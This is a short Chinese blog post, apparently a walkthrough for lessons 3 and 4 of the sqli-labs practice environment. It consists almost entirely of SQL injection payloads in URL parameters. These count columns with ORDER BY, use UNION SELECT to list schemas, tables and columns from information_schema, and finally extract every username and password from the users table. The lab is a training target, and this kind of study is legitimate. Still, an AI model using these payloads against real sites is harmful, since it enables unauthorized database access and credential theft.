时间:2021-07-01 10:21:17 帮助过:7人阅读
?id=1‘) order by 3 --+
?id=1‘) order by 4 --+
?id=1‘) and 1=2 union select 1,2,3 --+
?id=1‘) and 1=2 union select 1,version(),database() --+
?id=1‘) and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
?id=1‘) and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security‘),3 --+
?id=1‘) and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘),3 --+
?id=1‘) and 1=2 union select 1,(select group_concat(password) from security.users),(select group_concat(username) from security.users) --+
这一关跟第三关有所不同,是基于错误的get双引号变形字符型注入
下面博主就直接写出了爆破用户名密码的语句:
?id=1") and 1=2 union select 1,(select group_concat(password) from security.users),(select group_concat(username) from security.users) --+
sqli-labs注入lesson3-4闯关秘籍
标签:第三关 alt get 错误 方便 image color 使用 tab